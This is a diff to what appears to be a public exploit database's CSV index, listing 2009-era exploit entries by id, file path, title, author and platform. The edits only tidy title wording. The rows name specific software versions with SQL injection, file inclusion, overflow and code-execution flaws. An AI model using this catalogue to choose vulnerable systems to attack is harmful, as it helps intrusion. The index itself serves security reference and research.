7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 -7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections VUlnerabilities",2009-01-29,Zigma,php,webapps,0 -7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - ClickJacking",2009-01-29,UzmiX,windows,remote,0 +7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0 +7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 -7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 +7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 @@ -7478,15 +7479,15 @@ id,file,description,date,author,platform,type,port 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0 7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0 -7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution Exploit",2009-02-02,Osirys,php,webapps,0 -7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 -7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution Exploit (Metasploit)",2009-02-02,LSO,php,webapps,0 +7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps,0 +7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0 +7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit)",2009-02-02,LSO,php,webapps,0 18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 -7955,platforms/php/webapps/7955.txt,"groone's GuestBook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 +7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Buffer Overflow Exploit",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local,0 @@ -7497,23 +7498,23 @@ id,file,description,date,author,platform,type,port 7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 -7966,platforms/windows/remote/7966.txt,"navicopa webserver 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 +7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution Exploit",2009-02-03,Osirys,php,webapps,0 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 -7972,platforms/php/webapps/7972.py,"Openfiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 +7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - .PLF Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0 7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion",2009-02-04,make0day,php,webapps,0 -7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion Exploit",2009-02-04,Osirys,php,webapps,0 +7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion",2009-02-04,Osirys,php,webapps,0 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 -7985,platforms/windows/dos/7985.pl,"Novell GroupWise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 +7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0 @@ -7538,7 +7539,7 @@ id,file,description,date,author,platform,type,port 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0 -8010,platforms/windows/local/8010.pl,"FeedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 +8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - (entry) SQL Injection",2009-02-09,BackDoor,php,webapps,0 8013,platforms/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",hardware,dos,0 @@ -7587,10 +7588,10 @@ id,file,description,date,author,platform,type,port 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST 3.1.7 - Stack Buffer Overflow (PoC)",2009-02-16,ffwd,windows,dos,0 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption (PoC)",2009-02-16,Nine:Situations:Group,windows,remote,0 -8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 +8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 -8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 +8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0 @@ -7602,7 +7603,7 @@ id,file,description,date,author,platform,type,port 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0 -8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0 +8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption (PoC) (MS09-002)",2009-02-18,anonymous,windows,dos,0 8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption Exploit (MS09-002)",2009-02-20,Abysssec,windows,remote,0 @@ -7632,26 +7633,26 @@ id,file,description,date,author,platform,type,port 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 -8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 +8108,platforms/osx/local/8108.c,"Apple Mac OS X xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 -8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions Newsletter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0 +8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 8118,platforms/windows/remote/8118.html,"Orbit 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 -8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - '.hex' Local Code Execution Exploit",2009-02-27,DATA_SNIPER,windows,local,0 +8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - '.hex' Local Code Execution",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 -8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 - .m3u File Local Buffer Overflow (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 +8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 - '.m3u' File Local Buffer Overflow (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 -8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - (Accept-Language) Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 +8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload (ASP)",2009-03-02,mr.al7rbi,asp,webapps,0 @@ -7666,19 +7667,19 @@ id,file,description,date,author,platform,type,port 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 8142,platforms/windows/remote/8142.py,"EFS Easy Chat Server - Authentication Request Buffer Overflow Exploit (SEH)",2009-03-03,His0k4,windows,remote,80 8143,platforms/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution Exploit",2009-03-03,Nine:Situations:Group,windows,remote,0 -8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution Exploit",2009-03-03,Elazar,windows,remote,0 -8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - (Cross-Site Scripting / Directory traversal / Remote File Inclusion) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 -8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 +8144,platforms/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,windows,remote,0 +8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0 +8148,platforms/multiple/dos/8148.pl,"Yaws < 1.80 - (Multiple headers) Remote Denial of Service",2009-03-03,"Praveen Darshanam",multiple,dos,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (Cross-Site Request Forgery) Change Admin Pass",2009-03-03,Stack,windows,remote,0 -8150,platforms/php/webapps/8150.txt,"NovaBoard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 +8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,windows,remote,80 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,windows,dos,0 8158,platforms/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow",2009-03-05,SkD,windows,local,0 -8159,platforms/windows/local/8159.rb,"Media Commands - .m3l File Local Buffer Overflow",2009-03-05,Stack,windows,local,0 -8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0 +8159,platforms/windows/local/8159.rb,"Media Commands - '.m3l' File Local Buffer Overflow",2009-03-05,Stack,windows,local,0 +8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,windows,remote,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8162,platforms/windows/local/8162.py,"Media Commands - '.m3u' Universal SEH Overwrite",2009-03-05,His0k4,windows,local,0 8163,platforms/bsd/dos/8163.txt,"Multiple Vendors libc:fts_*() - Local Denial of Service",2009-03-05,SecurityReason,bsd,dos,0 @@ -7688,23 +7689,23 @@ id,file,description,date,author,platform,type,port 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php id' SQL Injection",2009-03-06,dun,php,webapps,0 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0 -8171,platforms/windows/local/8171.py,"Nokia Multimedia Player 1.0 - (Playlist) Universal SEH Overwrite",2009-03-09,His0k4,windows,local,0 +8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal SEH Overwrite",2009-03-09,His0k4,windows,local,0 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0 8173,platforms/windows/remote/8173.txt,"Belkin BullDog Plus UPS-Service - Buffer Overflow",2009-03-09,Elazar,windows,remote,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist SEH Overwrite",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - (mksmonen.sys) Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist SEH Overwrite",2009-03-09,His0k4,windows,local,0 8177,platforms/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,windows,local,0 -8178,platforms/windows/local/8178.pl,"MediaCoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local,0 -8179,platforms/windows/local/8179.rb,"MediaCoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local,0 +8178,platforms/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local,0 +8179,platforms/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local,0 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0 -8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - (base_id) SQL Injection",2009-03-09,d3b4g,php,webapps,0 +8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 -8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection",2009-03-09,netsoul,php,webapps,0 +8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 -8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 +8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authentication Denial of Service",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 @@ -7712,12 +7713,12 @@ id,file,description,date,author,platform,type,port 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (Playlist) Universal SEH Overwrite",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0 -8196,platforms/php/webapps/8196.txt,"Wordpress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 +8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal)",2009-03-13,SkD,windows,local,0 -8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 +8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",windows,remote,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0 @@ -7725,9 +7726,9 @@ id,file,description,date,author,platform,type,port 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 -8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 +8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 +8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 @@ -7736,13 +7737,13 @@ id,file,description,date,author,platform,type,port 